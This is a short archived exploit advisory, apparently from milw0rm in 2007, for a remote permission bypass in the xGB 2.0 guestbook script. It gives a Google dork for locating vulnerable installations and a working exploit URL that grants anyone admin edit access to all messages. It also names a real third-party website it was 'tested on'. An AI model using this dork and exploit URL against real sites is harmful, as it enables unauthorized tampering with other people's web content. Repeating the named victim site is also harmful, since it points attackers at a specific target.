28 lines
590 B
Text
Executable file
28 lines
590 B
Text
Executable file
/*
|
|
*
|
|
* xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability
|
|
* Bug discovered by DarkFuneral
|
|
* http://www.darkfuneral89.altervista.org/
|
|
*
|
|
* Affected Software: xGB
|
|
* CMS Site: "i don't know! :P"
|
|
* Severity: Critical
|
|
* Description: An attacker can edit all message in xGB
|
|
* Google Dork: allinurl:"xGb.php"
|
|
*
|
|
* E-Mail: darkfuneral89@gmail.com
|
|
*
|
|
*
|
|
*
|
|
*
|
|
* Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit
|
|
*
|
|
*
|
|
*
|
|
* Tested on www.culturebeach.de/guestbook.php
|
|
*
|
|
* Special Greetz to SystemFAILURE because I Love Him...
|
|
*
|
|
*/
|
|
|
|
# milw0rm.com [2007-08-29]
|